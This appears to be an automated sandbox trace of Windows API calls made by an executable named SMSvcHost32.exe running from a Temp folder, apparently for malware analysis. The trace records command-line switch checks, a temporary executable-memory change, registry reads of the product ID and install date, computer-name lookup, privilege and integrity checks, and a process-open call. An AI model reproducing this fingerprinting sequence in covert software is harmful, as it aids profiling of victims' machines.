	[0070.993] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch="--reinstall") returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.993] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch=" --service") returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] GetLastError () returned 0x0
	[0070.994] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch="-test") returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch=" --vwxyz") returned=" --vwxyz"
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.995] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0070.999] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] VirtualProtect (in: lpAddress=0x432e20, dwSize=0x184, flNewProtect=0x40, lpflOldProtect=0x203fdbc | out: lpflOldProtect=0x203fdbc*=0x4) returned 1
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.000] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.001] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.002] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.003] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.004] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] GetLastError () returned 0x0
	[0071.005] VirtualProtect (in: lpAddress=0x432e20, dwSize=0x184, flNewProtect=0x4, lpflOldProtect=0x203fdbc | out: lpflOldProtect=0x203fdbc*=0x40) returned 1
	[0071.005] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0071.005] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0071.005] GetVersion () returned 0x23f00206
	[0071.005] GetCurrentProcessId () returned 0xdb8
	[0071.005] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.006] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualQuery") returned 0x765b7a90
	[0071.006] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.006] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0071.006] GetNativeSystemInfo (in: lpSystemInfo=0x203fcd0 | out: lpSystemInfo=0x203fcd0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0071.006] GetComputerNameW (in: lpBuffer=0x4cfed0, nSize=0x203fd40 | out: lpBuffer="X2VS1CUM", nSize=0x203fd40) returned 1
	[0071.006] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x203fd14 | out: phkResult=0x203fd14*=0x18c) returned 0x0
	[0071.006] RegQueryValueExA (in: hKey=0x18c, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x4d13f0, lpcbData=0x203fd18*=0xc8 | out: lpType=0x0, lpData=0x4d13f0*=0xa4, lpcbData=0x203fd18*=0xa4) returned 0x0
	[0071.007] RegQueryValueExA (in: hKey=0x18c, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x203fd08, lpcbData=0x203fd18*=0x4 | out: lpType=0x0, lpData=0x203fd08*=0x3f, lpcbData=0x203fd18*=0x4) returned 0x0
	[0071.007] RegCloseKey (hKey=0x18c) returned 0x0
	[0071.007] lstrlenA (lpString="00342-50487-12048-AAOEM") returned 23
	[0071.007] GetComputerNameA (in: lpBuffer=0x4cfab0, nSize=0x203fd18 | out: lpBuffer="X2VS1CUM", nSize=0x203fd18) returned 1
	[0071.007] lstrlenA (lpString="X2VS1CUM") returned 8
	[0071.007] IsUserAnAdmin () returned 0
	[0071.007] CreateWellKnownSid (in: WellKnownSidType=0x27, DomainSid=0x0, pSid=0x203fd08, cbSid=0x203fd14 | out: pSid=0x203fd08*(Revision=0x0, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x81, [1]=0x59, [2]=0x1c, [3]=0xc2, [4]=0x2f, [5]=0x64), SubAuthority=([0]=0x50, [1]=0xfd, [2]=0x3, [3]=0x2, [4]=0xc)), cbSid=0x203fd14) returned 0
	[0071.007] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x203fca0 | out: TokenHandle=0x203fca0*=0x194) returned 1
	[0071.007] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x203fca8 | out: TokenInformation=0x0, ReturnLength=0x203fca8) returned 0
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.007] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x19, TokenInformation=0x4cf998, TokenInformationLength=0x14, ReturnLength=0x203fca8 | out: TokenInformation=0x4cf998, ReturnLength=0x203fca8) returned 1
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.008] GetLastError () returned 0x7a
	[0071.009] GetLastError () returned 0x7a
	[0071.009] GetSidSubAuthorityCount (pSid=0x4cf9a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x4cf9a1
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetSidSubAuthority (pSid=0x4cf9a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x4cf9a8
	[0071.009] CloseHandle (hObject=0x194) returned 1
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.009] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.010] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0071.010] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcess") returned 0x779d6f00
	[0071.010] NtOpenProcess (in: ProcessHandle=0x203fcb0, DesiredAccess=0x400, ObjectAttributes=0x203fc80*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x203fc98*(UniqueProcess=0xdb8, UniqueThread=0x0) | out: ProcessHandle=0x203fcb0*=0x194) returned 0x0
	[0071.010] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
